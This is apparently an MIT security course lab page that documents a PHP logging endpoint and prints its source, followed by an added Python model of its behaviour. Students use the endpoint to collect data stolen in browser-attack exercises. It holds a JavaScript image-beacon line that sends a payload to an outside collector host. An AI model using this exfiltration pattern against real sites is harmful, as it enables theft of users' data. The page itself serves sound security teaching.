Lab 4 Logging Script

You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:

(new Image()).src='https://css.csail.mit.edu/6.5660/2023/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)

Logged entries

Below are the most recent logged entries, so that you can check if your attack worked:


Source code

In case you are curious, here is the source code of this page.

<?php
header("Access-Control-Allow-Origin: *");

do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }

    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    // Replace CR/LF so a single request cannot forge extra log lines
    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.5660-2023-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }

    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    // Keep at most the 100 previous entries; the new entry goes first
    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }

    flock($file, LOCK_UN);
    fclose($file);

    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.5660/2023/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Logging Script</title>
    </head>
    <body>
        <h1>Lab 4 Logging Script</h1>
        <p>
            You can use this server side script to extract data from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause the server to log the payload:
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well.  The ID argument
            will help you distinguish your log entries from those sent by other
            students; we suggest picking your MIT Athena username.  Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 4, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="id">ID:</label><br />
            <input name="id" placeholder="your-mit-username" size="40" />
            <i>(some identifier to locate your payload in the log)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Log" name="log_submit" />
        </form>

        <h2>Logged entries</h2>
        <p>
            Below are the most recent logged entries, so that you can check
            if your attack worked:
        </p>

        <pre class="tty"><?php
            $lines = file_get_contents("/tmp/6.5660-2023-logger.txt");
            echo htmlspecialchars($lines);
        ?></pre>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>
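An offline model of the request checks, rate limit and log rotation that log.php performs, added here as an example (it is not the course's own code) so the server's behaviour can be exercised without PHP or APCu; the LogEndpoint class, its `now`/`stamp` arguments and the sample requests are assumptions of this example.

```python
"""Offline model of the lab logger's request handling (added example, not the course's log.php)."""

MAX_FIELD = 1000      # id and payload are each rejected beyond 1000 bytes
KEEP_LINES = 100      # the script re-reads at most 100 old lines before rewriting the file
DEDUP_SECONDS = 5     # apcu_add($payload, true, 5): an identical payload is refused for 5 s


def sanitize(value):
    """Mirror the script's str_replace of CR/LF with '.': one request can never forge extra lines."""
    return value.replace("\n", ".").replace("\r", ".")


class LogEndpoint:
    """Hypothetical in-memory stand-in for the log file plus the APCu rate-limit cache."""

    def __init__(self):
        self.lines = []   # log entries, newest first, as the rewritten file would hold them
        self.seen = {}    # raw payload -> time (seconds) at which its APCu entry expires

    def handle(self, params, now, stamp):
        """Return (HTTP status, response body) for one request with query dict `params`."""
        if "id" not in params:
            return 200, ""       # the script breaks out of the loop and just renders the page
        if len(params["id"].encode()) > MAX_FIELD:   # strlen() counts bytes
            return 413, "ID value is larger than 1000 bytes"
        if "payload" not in params:
            return 400, "No payload given"
        payload = params["payload"]
        if payload in ("", "0"):  # PHP empty() is true for both "" and "0"
            return 400, "Empty payload given"
        if len(payload.encode()) > MAX_FIELD:
            return 413, "Payload is larger than 1000 bytes"
        # apcu_add fails when the key is still present, i.e. the raw payload was seen < 5 s ago
        if self.seen.get(payload, 0) > now:
            return 429, "That exact payload was sent very recently; rejecting"
        self.seen[payload] = now + DEDUP_SECONDS
        entry = f"{stamp}: {sanitize(params['id'])}: {sanitize(payload)}\n"
        # new entry first, then up to 100 old ones: the file never exceeds 101 lines
        self.lines = [entry] + self.lines[:KEEP_LINES]
        return 200, "Logged!"
```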